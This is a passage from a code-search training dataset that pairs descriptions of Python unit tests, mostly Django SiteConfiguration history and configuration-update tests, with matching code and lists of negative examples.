site_configuration = SiteConfigurationFactory.create(
site=self.site,
)
site_configuration.site_values = {'test': 'test'}
site_configuration.save()
# Verify an entry to SiteConfigurationHistory was added.
site_configuration_history = SiteConfigurationHistory.objects.filter(
site=site_configuration.site,
).all()
# Make sure two entries (one for create and one for update) are saved for SiteConfiguration
assert len(site_configuration_history) == 2
|
[
"def test_site_configuration_post_save_receiver(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure an entry (and only one entry) is saved for SiteConfiguration\n assert len(site_configuration_history) == 1",
"def test_site_configuration_post_update_receiver_with_skip(self):\n # Add SiteConfiguration to database. By default, the site_valutes field contains only \"{}\".\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Update the SiteConfiguration we just created.\n site_configuration.site_values = {\"test\": \"test\"}\n save_siteconfig_without_historical_record(site_configuration) # Instead of .save().\n\n # Verify that the SiteConfiguration has been updated.\n assert site_configuration.get_value('test') == 'test'\n\n # Verify an entry to SiteConfigurationHistory was NOT added.\n # Make sure one entry (one for create and NONE for update) is saved for SiteConfiguration.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n assert len(site_configuration_history) == 1",
"def test_site_configuration_has_changed(self):\n # The database configuration timestamp is initialized as part\n # of the default data. In that case, it happened during the\n # package_setup() for this test run.\n last_update = Configuration.site_configuration_last_update(self._db)\n\n def ts():\n return Timestamp.value(\n self._db, Configuration.SITE_CONFIGURATION_CHANGED,\n service_type=None, collection=None\n )\n timestamp_value = ts()\n eq_(timestamp_value, last_update)\n\n # Now let's call site_configuration_has_changed().\n #\n # Sending cooldown=0 ensures we can change the timestamp value\n # even though it changed less than one second ago.\n time_of_update = datetime.datetime.utcnow()\n site_configuration_has_changed(self._db, cooldown=0)\n\n # The Timestamp has changed in the database.\n assert ts() > timestamp_value\n\n # The locally-stored last update value has been updated.\n new_last_update_time = Configuration.site_configuration_last_update(\n self._db, timeout=0\n )\n assert new_last_update_time > last_update\n assert (new_last_update_time - time_of_update).total_seconds() < 1\n\n # Let's be sneaky and update the timestamp directly,\n # without calling site_configuration_has_changed(). This\n # simulates another process on a different machine calling\n # site_configuration_has_changed() -- they will know about the\n # change but we won't be informed.\n timestamp = Timestamp.stamp(\n self._db, Configuration.SITE_CONFIGURATION_CHANGED,\n service_type=None, collection=None\n )\n\n # Calling Configuration.check_for_site_configuration_update\n # with a timeout doesn't detect the change.\n eq_(new_last_update_time,\n Configuration.site_configuration_last_update(self._db, timeout=60)\n )\n\n # But the default behavior -- a timeout of zero -- forces\n # the method to go to the database and find the correct\n # answer.\n newer_update = Configuration.site_configuration_last_update(\n self._db\n )\n assert newer_update > last_update\n\n # The Timestamp that tracks the last configuration update has\n # a cooldown; the default cooldown is 1 second. This means the\n # last update time will only be set once per second, to avoid\n # spamming the Timestamp with updates.\n\n # It's been less than one second since we updated the timeout\n # (with the Timestamp.stamp call). If this call decided that\n # the cooldown had expired, it would try to update the\n # Timestamp, and the code would crash because we're passing in\n # None instead of a database connection.\n #\n # But it knows the cooldown has not expired, so nothing\n # happens.\n site_configuration_has_changed(None)\n\n # Verify that the Timestamp has not changed (how could it,\n # with no database connection to modify the Timestamp?)\n eq_(newer_update,\n Configuration.site_configuration_last_update(self._db))",
"def test_no_entry_is_saved_for_errors(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure entry is saved if there is no error\n assert len(site_configuration_history) == 1\n\n with transaction.atomic():\n with pytest.raises(IntegrityError):\n # try to add a duplicate entry\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure no entry is saved if there an error\n assert len(site_configuration_history) == 1",
"def test_update_history_using_put(self):\n pass",
"def updated(self, newConfiguration):",
"def test_write_record_update(self):\n # Assert task's config is not expected\n task = TaskRepository.fetch_task_by_id(self.url_task.id)\n self.assertNotEquals(task.config, {'url': 'hey'})\n\n # Update tasks's config\n task.config = {'url': 'hey'}\n TaskRepository.write_record(task)\n\n # Assert tasks' config is as expected\n task = TaskRepository.fetch_task_by_id(self.url_task.id)\n self.assertEquals(task.config, {'url': 'hey'})",
"def test_config_hash_change_do_trigger(self):\n configs = \\\n self.saasherder.get_saas_targets_config(self.saas_file)\n\n desired_tc = list(configs.values())[1]\n desired_promo_data = desired_tc[\"promotion\"][\"promotion_data\"]\n desired_promo_data[0][\"data\"][TARGET_CONFIG_HASH] = \"Changed\"\n\n job_specs = \\\n self.saasherder.get_configs_diff_saas_file(self.saas_file)\n self.assertEqual(len(job_specs), 1)",
"def view_config_changes():",
"def test_config_hash_change_do_trigger(self):\n configs = self.saasherder.get_saas_targets_config_trigger_specs(self.saas_file)\n\n desired_tc = list(configs.values())[1].state_content\n desired_promo_data = desired_tc[\"promotion\"][\"promotion_data\"]\n desired_promo_data[0][\"data\"][0][TARGET_CONFIG_HASH] = \"Changed\"\n\n trigger_specs = self.saasherder.get_configs_diff_saas_file(self.saas_file)\n self.assertEqual(len(trigger_specs), 1)",
"def test_config_put(self):\n pass",
"def configuration_changed(self, config_changes):\n # TODO: implement",
"def added(self, configuration):",
"def test_update(self):\n # this is really tested graphically, no unit test here\n pass",
"def test_update_configuration(self):\n # create an instance of the API class\n api_instance = swagger_client.ConfigurationApi(\n swagger_client.ApiClient())\n cfg = SAMPLE_CFG\n\n # Start monitoring response time\n start = time.clock()\n\n # Add a new test configuration (to be modified later)\n api_response = api_instance.add_configuration(cfg)\n # End monitoring response time\n request_time = time.clock() - start\n\n self.assertLessEqual(request_time,\n API_MAX_ALLOWED_RESPONSE_TIME,\n \"Request completed in {}ms\".format(request_time))\n\n # Modifies some values of existing configuration\n # to create an updated configuration\n updated_configuration = api_response\n updated_configuration.name = \"UpdatedName\"\n updated_configuration.value = {\"answer\": 42}\n\n # Start monitoring response time\n start = time.clock()\n # UPDATES THE ADDED CONFIGURATION (main purpose of the test)\n api_instance.update_configuration(updated_configuration)\n # End monitoring response time\n request_time = time.clock() - start\n\n self.assertLessEqual(request_time,\n API_MAX_ALLOWED_RESPONSE_TIME,\n \"Request completed in {}ms\".format(request_time))",
"def register_for_changed_log_entries(self):\n pass",
"def test_update_time_tracking_entry(self):\n pass",
"def view_config_changes(self):\n pass",
"def testUpdateSettings(self):\n user = profile_utils.seedNDBUser()\n profile_utils.loginNDB(user, is_admin=True)\n\n postdata = {\n 'description': TEST_DESCRIPTION,\n 'active_program': self.site.active_program.key()\n }\n response = self.post('/site/edit', postdata=postdata)\n self.assertResponseRedirect(response, url='/site/edit')\n\n site = site_model.Site.get_by_key_name('site')\n self.assertEqual(site.description, TEST_DESCRIPTION)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test that and entry is NOT added to SiteConfigurationHistory each time a SiteConfiguration is updated with save_siteconfig_without_historical_record().
|
def test_site_configuration_post_update_receiver_with_skip(self):
# Add SiteConfiguration to database. By default, the site_valutes field contains only "{}".
site_configuration = SiteConfigurationFactory.create(
site=self.site,
)
# Update the SiteConfiguration we just created.
site_configuration.site_values = {"test": "test"}
save_siteconfig_without_historical_record(site_configuration) # Instead of .save().
# Verify that the SiteConfiguration has been updated.
assert site_configuration.get_value('test') == 'test'
# Verify an entry to SiteConfigurationHistory was NOT added.
# Make sure one entry (one for create and NONE for update) is saved for SiteConfiguration.
site_configuration_history = SiteConfigurationHistory.objects.filter(
site=site_configuration.site,
).all()
assert len(site_configuration_history) == 1
|
[
"def test_site_configuration_post_save_receiver(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure an entry (and only one entry) is saved for SiteConfiguration\n assert len(site_configuration_history) == 1",
"def test_no_entry_is_saved_for_errors(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure entry is saved if there is no error\n assert len(site_configuration_history) == 1\n\n with transaction.atomic():\n with pytest.raises(IntegrityError):\n # try to add a duplicate entry\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure no entry is saved if there an error\n assert len(site_configuration_history) == 1",
"def test_site_configuration_post_update_receiver(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n site_configuration.site_values = {'test': 'test'}\n site_configuration.save()\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure two entries (one for create and one for update) are saved for SiteConfiguration\n assert len(site_configuration_history) == 2",
"def test_site_configuration_has_changed(self):\n # The database configuration timestamp is initialized as part\n # of the default data. In that case, it happened during the\n # package_setup() for this test run.\n last_update = Configuration.site_configuration_last_update(self._db)\n\n def ts():\n return Timestamp.value(\n self._db, Configuration.SITE_CONFIGURATION_CHANGED,\n service_type=None, collection=None\n )\n timestamp_value = ts()\n eq_(timestamp_value, last_update)\n\n # Now let's call site_configuration_has_changed().\n #\n # Sending cooldown=0 ensures we can change the timestamp value\n # even though it changed less than one second ago.\n time_of_update = datetime.datetime.utcnow()\n site_configuration_has_changed(self._db, cooldown=0)\n\n # The Timestamp has changed in the database.\n assert ts() > timestamp_value\n\n # The locally-stored last update value has been updated.\n new_last_update_time = Configuration.site_configuration_last_update(\n self._db, timeout=0\n )\n assert new_last_update_time > last_update\n assert (new_last_update_time - time_of_update).total_seconds() < 1\n\n # Let's be sneaky and update the timestamp directly,\n # without calling site_configuration_has_changed(). This\n # simulates another process on a different machine calling\n # site_configuration_has_changed() -- they will know about the\n # change but we won't be informed.\n timestamp = Timestamp.stamp(\n self._db, Configuration.SITE_CONFIGURATION_CHANGED,\n service_type=None, collection=None\n )\n\n # Calling Configuration.check_for_site_configuration_update\n # with a timeout doesn't detect the change.\n eq_(new_last_update_time,\n Configuration.site_configuration_last_update(self._db, timeout=60)\n )\n\n # But the default behavior -- a timeout of zero -- forces\n # the method to go to the database and find the correct\n # answer.\n newer_update = Configuration.site_configuration_last_update(\n self._db\n )\n assert newer_update > last_update\n\n # The Timestamp that tracks the last configuration update has\n # a cooldown; the default cooldown is 1 second. This means the\n # last update time will only be set once per second, to avoid\n # spamming the Timestamp with updates.\n\n # It's been less than one second since we updated the timeout\n # (with the Timestamp.stamp call). If this call decided that\n # the cooldown had expired, it would try to update the\n # Timestamp, and the code would crash because we're passing in\n # None instead of a database connection.\n #\n # But it knows the cooldown has not expired, so nothing\n # happens.\n site_configuration_has_changed(None)\n\n # Verify that the Timestamp has not changed (how could it,\n # with no database connection to modify the Timestamp?)\n eq_(newer_update,\n Configuration.site_configuration_last_update(self._db))",
"def test_set_last_timestamp_same(self, save_mock):\n self._config.last_timestamp = 1234567890\n save_mock.assert_not_called()",
"def testBacklogWithItemNotAdded(self):\n backlog = BacklogConfiguration(self.env, name=\"Global Backlog\")\n backlog.ticket_types=[Type.REQUIREMENT]\n backlog.save()\n # Create some tickets and add them to the Backlog\n b = self.bmm.get(name=\"Global Backlog\")\n t1 = self.teh.create_ticket(Type.REQUIREMENT, props={Key.BUSINESS_VALUE: '3000'})\n t_no = self.teh.create_ticket(Type.USER_STORY, props={Key.STORY_POINTS: '13'})\n t2 = self.teh.create_ticket(Type.REQUIREMENT, props={Key.BUSINESS_VALUE: '1200'})\n b1 = self.bmm.get(name=\"Global Backlog\")\n # Test that a belonging ticket is really belonging\n self.assert_contains(t2, b1)\n # Test if the external ticket, has been loaded into the Backlog\n self.assert_contains(t1, b1)\n # Test that the t_no, User Story is also not in the Backlog\n self.assert_not_contains(t_no, b1)",
"def test_same_configs_do_not_trigger(self):\n job_specs = \\\n self.saasherder.get_configs_diff_saas_file(self.saas_file)\n self.assertListEqual(job_specs, [])",
"def test_write_record_update(self):\n # Assert task's config is not expected\n task = TaskRepository.fetch_task_by_id(self.url_task.id)\n self.assertNotEquals(task.config, {'url': 'hey'})\n\n # Update tasks's config\n task.config = {'url': 'hey'}\n TaskRepository.write_record(task)\n\n # Assert tasks' config is as expected\n task = TaskRepository.fetch_task_by_id(self.url_task.id)\n self.assertEquals(task.config, {'url': 'hey'})",
"def test_update_not_existing_configuration(self):\n # create an instance of the API class\n api_instance = swagger_client.ConfigurationApi(\n swagger_client.ApiClient())\n cfg = SAMPLE_CFG\n\n # Start monitoring response time\n start = time.clock()\n\n # Add a new test configuration (to be modified later)\n api_response = api_instance.add_configuration(cfg)\n # End monitoring response time\n request_time = time.clock() - start\n\n self.assertLessEqual(request_time,\n API_MAX_ALLOWED_RESPONSE_TIME,\n \"Request completed in {}ms\".format(request_time))\n\n # Modifies some values of existing configuration\n # to create an updated invalid configuration\n updated_configuration = api_response\n updated_configuration.id = str(uuid.uuid4())\n updated_configuration.value = {\"answer\": 42}\n\n # Start monitoring response time\n start = time.clock()\n\n try:\n # UPDATES THE ADDED CONFIGURATION (main purpose of the test)\n api_instance.update_configuration(updated_configuration)\n except swagger_client.rest.ApiException as excp:\n if excp.status != 404:\n raise excp\n else:\n # End monitoring response time\n request_time = time.clock() - start\n\n self.assertLessEqual(\n request_time,\n API_MAX_ALLOWED_RESPONSE_TIME,\n \"Request completed in {}ms\".format(request_time))\n\n # Check if the error returned is the one expected\n self.assertEqual(excp.status, 404)\n return\n\n raise Exception(\"Configuration should not be updated\")",
"def test_update_history_using_put(self):\n pass",
"def test_metadata_excludes_set_once():\n\n conf = Config()\n conf._metadata_exclusions.append(\"foo\")\n conf._metadata_exclusions.append(\"foo\")\n conf._metadata_exclusions.append(\"foo\")\n conf._metadata_exclusions.append(\"bar\")\n conf._metadata_exclusions.append(\"foo\")\n conf._metadata_exclusions.append(\"bar\")\n assert conf._metadata_exclusions == [\"foo\", \"bar\"]",
"def test_suppress_state_save_no_change(self, save_mock):\n # Try to mark with success more than once\n self._config.mark_running()\n self._config.mark_running()\n\n save_mock.assert_called_once()",
"def unset(key):\n if key in memo:\n del memo[key]\n (db\n .session\n .query(SiteConfiguration)\n .filter(key == key)\n .delete())\n db.session.commit()",
"def testBacklogCreation(self):\n global_backlog = BacklogConfiguration(self.env, name=\"Global Backlog\")\n global_backlog.ticket_types = [Type.REQUIREMENT]\n global_backlog.save()\n # Now reload the same backlog and check that the type and order are kept\n b1 = self.bmm.get(name=\"Global Backlog\")\n self.assert_equals(b1.ticket_types, [Type.REQUIREMENT])",
"def test_equal_false(self):\n config1 = Config({'foo': {'bar': 'baz'}})\n config2 = Config({'foo': {'bar': 'bza'}})\n self.assertFalse(config1 == config2)",
"def test_catchall(self):\n # Nullify all datestatuschanged so the public add-ons hit the\n # catch-all.\n (File.objects.filter(status=amo.STATUS_PUBLIC)\n .update(datestatuschanged=None))\n Addon.objects.update(last_updated=None)\n\n cron.addon_last_updated()\n for addon in Addon.objects.filter(status=amo.STATUS_PUBLIC):\n eq_(addon.last_updated, addon.created)\n\n # Make sure it's stable.\n cron.addon_last_updated()\n for addon in Addon.objects.filter(status=amo.STATUS_PUBLIC):\n eq_(addon.last_updated, addon.created)",
"def testGlobalBacklogWithStrictOption(self):\n backlog = BacklogConfiguration(self.env, name=\"Bug-Backlog\")\n backlog.ticket_types=[Type.BUG, Type.TASK]\n backlog.save()\n # Build a hierarchy of Bug tasks\n b1 = self.teh.create_ticket(Type.BUG)\n t1 = self.teh.create_ticket(Type.TASK, \n props={Key.REMAINING_TIME: '3'})\n t2 = self.teh.create_ticket(Type.TASK, \n props={Key.REMAINING_TIME: '7'})\n # Link the Bug only with one task\n self.assert_true(b1.link_to(t1))\n self.assert_equals('', b1[Key.SPRINT])\n # Standard trac fields must not be None (see property change rendering\n # for ticket preview)\n self.assert_equals('', b1[Key.MILESTONE])\n self.assert_equals(Type.BUG, b1[Key.TYPE])\n self.assert_equals('', t1[Key.SPRINT])\n self.assert_equals('', t1[Key.MILESTONE])\n self.assert_equals('', t2[Key.SPRINT])\n self.assert_equals('', t2[Key.MILESTONE])\n \n # Now load the backlog, and check that even with strict\n # a global backlog shows all the tickets\n b = self.bmm.get(name=\"Bug-Backlog\")\n if len(b) != 3:\n print_backlog(b)\n self.fail(\"Backlog count wrong! %s != 3\" % \\\n len(b))\n # Now links also the second task\n self.assert_true(b1.link_to(t2))\n # Now reload the backlog and check if the second task is there too\n self.assert_length(3, b)\n # Now plan the a task for a sprint so that should disappear from the\n # backlog\n s = self.teh.create_sprint(\"Test\")\n t1[Key.SPRINT] = s.name\n self.assert_true(t1.save_changes('Tester', 'Planned...'))\n self.assert_length(2, b)",
"async def test_unload_config_entry(hass: HomeAssistant, entry, lcn_connection) -> None:\n await hass.config_entries.async_unload(entry.entry_id)\n assert hass.states.get(SENSOR_VAR1).state == STATE_UNAVAILABLE\n assert hass.states.get(SENSOR_SETPOINT1).state == STATE_UNAVAILABLE\n assert hass.states.get(SENSOR_LED6).state == STATE_UNAVAILABLE\n assert hass.states.get(SENSOR_LOGICOP1).state == STATE_UNAVAILABLE",
"def test_get_history_no_update(self):\n self.user_access()\n self.posting_article(post_article)\n slug = self.article_slug()\n url = reverse(\"comments:post_comment\", kwargs={'slug': slug})\n res = self.client.post(url, data=comment, format=\"json\")\n data = res.data\n comment_id = data[\"comment\"][\"id\"]\n fetch_url = reverse(\"comments:comment_history\", kwargs={'pk':comment_id})\n response = self.client.get(fetch_url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertIn(comment[\"body\"], \n response.data[\"history\"][0][\"comment_body\"])"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test that and entry is not added to SiteConfigurationHistory if there is an error while saving SiteConfiguration.
|
def test_no_entry_is_saved_for_errors(self):
# add SiteConfiguration to database
site_configuration = SiteConfigurationFactory.create(
site=self.site,
)
# Verify an entry to SiteConfigurationHistory was added.
site_configuration_history = SiteConfigurationHistory.objects.filter(
site=site_configuration.site,
).all()
# Make sure entry is saved if there is no error
assert len(site_configuration_history) == 1
with transaction.atomic():
with pytest.raises(IntegrityError):
# try to add a duplicate entry
site_configuration = SiteConfigurationFactory.create(
site=self.site,
)
site_configuration_history = SiteConfigurationHistory.objects.filter(
site=site_configuration.site,
).all()
# Make sure no entry is saved if there an error
assert len(site_configuration_history) == 1
|
[
"def test_site_configuration_post_save_receiver(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure an entry (and only one entry) is saved for SiteConfiguration\n assert len(site_configuration_history) == 1",
"def test_site_configuration_post_update_receiver_with_skip(self):\n # Add SiteConfiguration to database. By default, the site_valutes field contains only \"{}\".\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Update the SiteConfiguration we just created.\n site_configuration.site_values = {\"test\": \"test\"}\n save_siteconfig_without_historical_record(site_configuration) # Instead of .save().\n\n # Verify that the SiteConfiguration has been updated.\n assert site_configuration.get_value('test') == 'test'\n\n # Verify an entry to SiteConfigurationHistory was NOT added.\n # Make sure one entry (one for create and NONE for update) is saved for SiteConfiguration.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n assert len(site_configuration_history) == 1",
"def test_site_configuration_post_update_receiver(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n site_configuration.site_values = {'test': 'test'}\n site_configuration.save()\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure two entries (one for create and one for update) are saved for SiteConfiguration\n assert len(site_configuration_history) == 2",
"def test_add_site_dberror(self, mock_session):\n self.__db_error(mock_session)\n res = self.__client.post('/site/api/v1.0/site', data=self.TEST_SITE)\n self.assertEqual(res.status_code, 500)",
"def test_save_failures(self):\r\n\r\n records = self._get_records(5, keyspace=\"eggs\", column_family=\"bacon\")\r\n\r\n for record in records:\r\n record.is_modified = lambda: True\r\n record.valid = lambda: False\r\n self.object.append(record)\r\n\r\n self.assertRaises(ErrorMissingField, self.object.save)",
"def test_models_edx_save_problem_fail_with_valid_statement(statement):\n assert statement.event_type == \"save_problem_fail\"\n assert statement.page == \"x_module\"",
"def test_invalid_software_entry(self):\n with pytest.raises(ValueError):\n self.fh.software_history_entry = {\"invalid\": None}\n\n with pytest.raises(ValueError):\n self.fh.software_history_entry = {\"name\": None}",
"def testBacklogWithItemNotAdded(self):\n backlog = BacklogConfiguration(self.env, name=\"Global Backlog\")\n backlog.ticket_types=[Type.REQUIREMENT]\n backlog.save()\n # Create some tickets and add them to the Backlog\n b = self.bmm.get(name=\"Global Backlog\")\n t1 = self.teh.create_ticket(Type.REQUIREMENT, props={Key.BUSINESS_VALUE: '3000'})\n t_no = self.teh.create_ticket(Type.USER_STORY, props={Key.STORY_POINTS: '13'})\n t2 = self.teh.create_ticket(Type.REQUIREMENT, props={Key.BUSINESS_VALUE: '1200'})\n b1 = self.bmm.get(name=\"Global Backlog\")\n # Test that a belonging ticket is really belonging\n self.assert_contains(t2, b1)\n # Test if the external ticket, has been loaded into the Backlog\n self.assert_contains(t1, b1)\n # Test that the t_no, User Story is also not in the Backlog\n self.assert_not_contains(t_no, b1)",
"def _check_site_keys(self):\n self.sites = []\n for site_key in self.unique_site_keys:\n site_text = ', '.join([str(x) for x in site_key.values()])\n try:\n site = Site.objects.filter(**site_key)[0] # silent fail and grab first if not unique\n self.sites.append({'name':site_text, 'site':site})\n except IndexError:\n if self.data_sheet.site_type == 'coord-based':\n # just insert it \n lon = float(site_text.split('(')[1].split(' ')[0])\n lat = float(site_text.split(' ')[1].split(')')[0])\n point = Point(lon, lat)\n closest = impute_state_county(point)\n if not closest['error']:\n site, created = Site.objects.get_or_create(state=closest['state'], \n county=closest['county'], \n geometry=str(point),\n transaction=self.user_txn)\n if site:\n self.sites.append({'name':site_text, 'site':site})\n else:\n self.errors.append(\"\"\"%s\"\"\" % closest['error'])\n\n else:\n urlargs = urlencode(site_key) \n if urlargs:\n urlargs = \"?\" + urlargs\n\n self.errors.append(\"\"\"Site <em>'%s'</em> is not in the database. <br/>\n <button href=\"/site/create%s\" class=\"btn btn-mini create-site\" disabled> Create new site record </button>\n <!--<a href=\"/site/list\" class=\"btn btn-mini\"> Match to existing site record </a>-->\n \"\"\" % (site_text, urlargs ))\n self.sites.append({'name':site_text, 'site':None})\n\n if len(self.errors) > 0:\n site_form = CreateSiteForm()\n self.user_txn.delete()\n self.response = bulk_bad_request(self.form, self.request, \n self.errors, \n site_form=site_form, \n json=self.get_org_json())\n return False\n return True",
"def test_site_configuration_has_changed(self):\n # The database configuration timestamp is initialized as part\n # of the default data. In that case, it happened during the\n # package_setup() for this test run.\n last_update = Configuration.site_configuration_last_update(self._db)\n\n def ts():\n return Timestamp.value(\n self._db, Configuration.SITE_CONFIGURATION_CHANGED,\n service_type=None, collection=None\n )\n timestamp_value = ts()\n eq_(timestamp_value, last_update)\n\n # Now let's call site_configuration_has_changed().\n #\n # Sending cooldown=0 ensures we can change the timestamp value\n # even though it changed less than one second ago.\n time_of_update = datetime.datetime.utcnow()\n site_configuration_has_changed(self._db, cooldown=0)\n\n # The Timestamp has changed in the database.\n assert ts() > timestamp_value\n\n # The locally-stored last update value has been updated.\n new_last_update_time = Configuration.site_configuration_last_update(\n self._db, timeout=0\n )\n assert new_last_update_time > last_update\n assert (new_last_update_time - time_of_update).total_seconds() < 1\n\n # Let's be sneaky and update the timestamp directly,\n # without calling site_configuration_has_changed(). This\n # simulates another process on a different machine calling\n # site_configuration_has_changed() -- they will know about the\n # change but we won't be informed.\n timestamp = Timestamp.stamp(\n self._db, Configuration.SITE_CONFIGURATION_CHANGED,\n service_type=None, collection=None\n )\n\n # Calling Configuration.check_for_site_configuration_update\n # with a timeout doesn't detect the change.\n eq_(new_last_update_time,\n Configuration.site_configuration_last_update(self._db, timeout=60)\n )\n\n # But the default behavior -- a timeout of zero -- forces\n # the method to go to the database and find the correct\n # answer.\n newer_update = Configuration.site_configuration_last_update(\n self._db\n )\n assert newer_update > last_update\n\n # The Timestamp that tracks the last configuration update has\n # a cooldown; the default cooldown is 1 second. This means the\n # last update time will only be set once per second, to avoid\n # spamming the Timestamp with updates.\n\n # It's been less than one second since we updated the timeout\n # (with the Timestamp.stamp call). If this call decided that\n # the cooldown had expired, it would try to update the\n # Timestamp, and the code would crash because we're passing in\n # None instead of a database connection.\n #\n # But it knows the cooldown has not expired, so nothing\n # happens.\n site_configuration_has_changed(None)\n\n # Verify that the Timestamp has not changed (how could it,\n # with no database connection to modify the Timestamp?)\n eq_(newer_update,\n Configuration.site_configuration_last_update(self._db))",
"def test_update_history_using_put(self):\n pass",
"def test_set_last_timestamp_same(self, save_mock):\n self._config.last_timestamp = 1234567890\n save_mock.assert_not_called()",
"def test_write_record_update(self):\n # Assert task's config is not expected\n task = TaskRepository.fetch_task_by_id(self.url_task.id)\n self.assertNotEquals(task.config, {'url': 'hey'})\n\n # Update tasks's config\n task.config = {'url': 'hey'}\n TaskRepository.write_record(task)\n\n # Assert tasks' config is as expected\n task = TaskRepository.fetch_task_by_id(self.url_task.id)\n self.assertEquals(task.config, {'url': 'hey'})",
"def test_config_put(self):\n pass",
"def test_invalid_setting_key(self):\n ...",
"def test_update_not_existing_configuration(self):\n # create an instance of the API class\n api_instance = swagger_client.ConfigurationApi(\n swagger_client.ApiClient())\n cfg = SAMPLE_CFG\n\n # Start monitoring response time\n start = time.clock()\n\n # Add a new test configuration (to be modified later)\n api_response = api_instance.add_configuration(cfg)\n # End monitoring response time\n request_time = time.clock() - start\n\n self.assertLessEqual(request_time,\n API_MAX_ALLOWED_RESPONSE_TIME,\n \"Request completed in {}ms\".format(request_time))\n\n # Modifies some values of existing configuration\n # to create an updated invalid configuration\n updated_configuration = api_response\n updated_configuration.id = str(uuid.uuid4())\n updated_configuration.value = {\"answer\": 42}\n\n # Start monitoring response time\n start = time.clock()\n\n try:\n # UPDATES THE ADDED CONFIGURATION (main purpose of the test)\n api_instance.update_configuration(updated_configuration)\n except swagger_client.rest.ApiException as excp:\n if excp.status != 404:\n raise excp\n else:\n # End monitoring response time\n request_time = time.clock() - start\n\n self.assertLessEqual(\n request_time,\n API_MAX_ALLOWED_RESPONSE_TIME,\n \"Request completed in {}ms\".format(request_time))\n\n # Check if the error returned is the one expected\n self.assertEqual(excp.status, 404)\n return\n\n raise Exception(\"Configuration should not be updated\")",
"def test_add_not_valid_configuration(self):\n # create an instance of the API class\n api_instance = swagger_client.ConfigurationApi(\n swagger_client.ApiClient())\n cfg = swagger_client.NewConfiguration(\n name=\"GoogleSettings\",\n value=4)\n\n # Start monitoring response time\n start = time.clock()\n # Add a new test configuration\n try:\n api_instance.add_configuration(cfg)\n except swagger_client.rest.ApiException as excp:\n if excp.status != 400:\n raise excp\n else:\n request_time = time.clock() - start\n # End monitoring response time\n\n self.assertLessEqual(request_time,\n API_MAX_ALLOWED_RESPONSE_TIME,\n \"Request completed in {}ms\".format(\n request_time))\n\n # Check if the error returned is the one expected\n self.assertEqual(excp.status, 400)\n return\n\n raise Exception(\"Configuration should not be added\")",
"def test_update_unregistered_fail(collection, session):\n\n # Given\n\n table_config = TableConfig(name=\"name\", description=\"description\", datasets=[], rows=[], variables=[], columns=[],\n definition_uid = None)\n\n # When\n with pytest.raises(ValueError, match=\"Cannot update Table Config without a config_uid.\"):\n collection.update(table_config)",
"def test_failed_update_existing_build(self):"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test that get_all_orgs returns all orgs from site configuration.
|
def test_get_all_orgs(self):
expected_orgs = [self.test_config1['course_org_filter'], self.test_config2['course_org_filter']]
# add SiteConfiguration to database
SiteConfigurationFactory.create(
site=self.site,
site_values=self.test_config1
)
SiteConfigurationFactory.create(
site=self.site2,
site_values=self.test_config2
)
# Test that the default value is returned if the value for the given key is not found in the configuration
self.assertCountEqual(SiteConfiguration.get_all_orgs(), expected_orgs)
|
[
"def test_get_all_orgs_returns_only_enabled(self):\n expected_orgs = [self.test_config2['course_org_filter']]\n # add SiteConfiguration to database\n SiteConfigurationFactory.create(\n site=self.site,\n site_values=self.test_config1,\n enabled=False,\n )\n SiteConfigurationFactory.create(\n site=self.site2,\n site_values=self.test_config2\n )\n\n # Test that the default value is returned if the value for the given key is not found in the configuration\n self.assertCountEqual(SiteConfiguration.get_all_orgs(), expected_orgs)",
